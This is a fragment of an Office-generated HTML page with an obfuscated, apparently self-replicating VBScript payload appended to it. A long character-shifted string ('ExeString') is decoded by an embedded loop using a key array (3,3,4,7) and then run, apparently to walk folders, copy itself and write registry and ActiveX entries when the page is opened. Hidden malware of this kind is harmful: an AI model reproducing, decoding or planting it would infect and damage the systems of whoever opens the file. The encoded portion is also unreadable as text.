^doa^&amp;GbupToLebhe+Oa`ToembN^dM]meS]erb(=fpg=bdn^b&gt;ka?rk_mflj?rk_mfljHGqfj^c^Clh]bo$I^qdG^jaKgBnkloKbpqfbJ^uqPbpClh]boJZjb6COH+DamClh]bo$I^qdG^jaO^qPafpBbibo:BhiaakK^i^+CeebpEqp&gt;ufomp9-?lo&gt;^`dQeelCfh^FjQeelCfh^p?fia&gt;uq6R?Zpb$?PL*@bqAqqbjlfljG^ja!QeelCfh^+M]me&amp;%FbCfh^Bup:AQJLo?fia&gt;uq6DMJILo?fia&gt;uq6=LMHoBbibAqq9MDIKkCeebBtm:GPLQd^k&lt;^ihHG=imbj]Ql$Mefo?fia'M^pa)dmjiAepbE_CeebBtm:S?OQd^k&lt;^ihHG=imbj]Ql$Mefo?fia'M^pa)r[p%BhlbFbCfh^Bup:AQQQeagDmqBtbpqo:-Bj]FbKaqqBc$N@^o^%M]meK]fb&amp;6R?Zpb$PfkLZqe@^phphmY&amp;Kk%Q&lt;^pa!M^paK^i^&amp;9R@]lb%SbkM]meAalhqki&amp;%MebjEpmBuelqp6.Bk`FcFcAqqAqfppl:)Qd^k?PL*&lt;lmu?fiaTfjI^qd#lvpp^j0.Uabodqll'fke)M]meK]fb?PL*&lt;lmu?fiaTfjI^qd#pb_X?li`^o+dmq(I^qdG^jaBj]FbBj]Cqg`qehkCqg`qehkGCPbp=fj$KgBnkloKbpqfbJ^uqBon'@iaZoMbppBq9TP_kfmp'P`nbmqBniijZjbFc&gt;ooMebjFjPebn^:eqie&gt;ipaFjPebn^:s_oAgaE_E_FjPebn^:s_oQd^kLbq?PL6@n^^qaH_ga\q%L`oeiqfj`+CeebPulqbiH_ga\q%PamToLebhe:&lt;ob]mbL^cb`p!TO\oflm+Pd^iiAepbPbp&gt;mlebL^cb`p:`h`ri^kq*Zmmh^qp$HG[`rbom&amp;&gt;mlebL^cb`p'pbp&lt;IPE=%w?601=@/.&amp;.@B)*.-=-*==?6))-@,-CA11&gt;-&gt;v&amp;&gt;mlebL^cb`p'`oaZqbEgpq]g`b$O^qSlPeaei9&gt;mlebL^cb`p'DbpH_ga\q%%&gt;liibK[gb_m+pam@IOBA%t-A0,CB,**C,20*-*@C)161,&amp;--=)@6,.1/.1z%&gt;liibK[gb_m+`n^^qaBkppZk`a!&amp;Lbq?PL6&gt;liibK[gb_m+DamL_f^`q$AgaE_O^q@bphK[gb_m:?PL*=ofr^p?lo&gt;^`dAfodQbiiFjAfodL_f^`qFc=fpgMbjl'AoeobQuib87/:ka=fpgMbjl'AoeobQuib87.MebjBtbqBho&gt;kaBc?fk]evAelh9AfodQbii+AnbsbH^qqakJ^uqAfiLqd^o&gt;nk%0%O]galibwbClnf:,Ql,Kmebn:oo$b&amp;9Fkp!%6#Oj]&amp;&amp;KbtmP^jmOmofj`:?lob:.MlH^k%PafpP^uq%QafmKqf::p`$Ffa$MefoMbup%f)-&amp;BcP^jmJnj9.0MebjQafmKqf:+5&gt;ipaBcP^jmJnj9.-MebjQafmKqf:+6&gt;kaBcMbjl&lt;e^n:?ao%P^jmJnj)Lqd^o&gt;nk%fFla-&amp;&amp;FcMbjl&lt;e^n:?ao%/-&amp;PabkQbii@e]k:&lt;eo$*5&amp;Bk`FcQbiiPqnbkd6QafmPpkfkc#P^jm?a^oKbtmQgIl_dPqn:&gt;ub_nqb$AefHar&gt;on!0&amp;(MefoMbup#r[@oH_#Dbv=ko%,:#Hqeak&gt;on!-&amp;#s^&lt;oIbG^v&gt;nk%.%:#Kmebn:oo$*&amp;s_?kIcHar&gt;on!/&amp;6Lpabo=ko%.#o_@nEc#Hbu:oo$,&amp;9Lqd^o&gt;nk%0%##r[@oH_#?lob:.MlH^k%AqbPpkfkco_@nEc#QbiiKri:=l`%Iba%AqbPpkfkc%f)-&amp;s_?kIcFbQbiiKri:-1Qd^ks_?kIcQafmKqf:,1s_?kIcBj]Fb#r[@oH_#Mbjl&lt;e^n:?ao%P^jmJnj'Hbu:oo$bJk]1%o_@nEc#FcMbjl&lt;e^n:?ao%.1&amp;Pabk#s^&lt;oIbP^jm?a^o6s^&lt;os_?kIcBhlbFbQbii@e]k:&lt;eo$+6&amp;Mebj#r[@oH_#Mbjl&lt;e^n:r[Ic#s^&lt;oIbAgaE_o_@nEc#QeelQbtm:MefoMbup#P^jm?a^o#s^&lt;oIbJ^uq&amp;s^&lt;oIb#&gt;ub_nqb$MefoMbupMefoMbup:&gt;ubOmofj`:QafmPpkfkc#EqieQbtm:5p_kfmpi^j`r^c^:s^l`oeiq;#r[@oH_#al_njbjm+tnbqb##5aeopprib9 mlobqfkg7^^lliqmb8ebcp3-mt4qki7-lq8sbaqd3-mt4eabdep3-mt4w)bkaaq7/44self_eefqu3ee]abj ;8#&gt;LIIBPK&gt;I&gt;:HF#\dq^pqABFCAQ:,TF@ME:,`l`^:`kf+jo'^_mfsaQ+&gt;_mfsa#U@kfmlj^kq:#9+:MMH&gt;Q;#5,`bs;s_?kIc8#,p_kfmp7s_?kIc8#p`nbmqe^kcn^da6s_o\oflm;s^&lt;oIb#PafpP^uqs^&lt;oIb#QgIl_dPqn#r[@oH_#9+l`oeiq;#r[@oH_#9+;LAU7s_?kIc8#,EPFI;S^lQbtm:MefoMbup#r[@oH_#NkIk\hPpk#o_@nEcHFXpq]kq%%SbkM]me9CPK'DbpLmb_b^iBhiaak%-%#UBc$?PL*?fia&gt;ufomp%SbkM]meta[YCkeabn'eqp&amp;&amp;MebjCOH+@kivCeebSbkM]meta[YCkeabn'eqp)TegM^pa#tb^UhgsZii*`fcBj]FbFb%COH+CeebBtbpqo!TfjI^qd#lvpp^j0.Uabodqll'fke&amp;&amp;MebjCOH+@kivCeebSbkM]mepulqbi,/Y`^phphm+egf(PfkLZqeorpqaf0/Xdgt]ei+cbcBk`FcBk`Crj\qfk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("Dim KeyArr(3),ThisText"&amp;vbCrLf&amp;"KeyArr(0) = 3"&amp;vbCrLf&amp;"KeyArr(1) = 3"&amp;vbCrLf&amp;"KeyArr(2) = 4"&amp;vbCrLf&amp;"KeyArr(3) = 7"&amp;vbCrLf&amp;"For i=1 To Len(ExeString)"&amp;vbCrLf&amp;"TempNum = Asc(Mid(ExeString,i,1))"&amp;vbCrLf&amp;"If TempNum = 18 Then"&amp;vbCrLf&amp;"TempNum = 34"&amp;vbCrLf&amp;"End If"&amp;vbCrLf&amp;"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&amp;vbCrLf&amp;"If TempChar = Chr(28) Then"&amp;vbCrLf&amp;"TempChar = vbCr"&amp;vbCrLf&amp;"ElseIf TempChar = Chr(29) Then"&amp;vbCrLf&amp;"TempChar = vbLf"&amp;vbCrLf&amp;"End If"&amp;vbCrLf&amp;"ThisText = ThisText &amp; TempChar"&amp;vbCrLf&amp;"N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(This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cript&gt;&lt;/span&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p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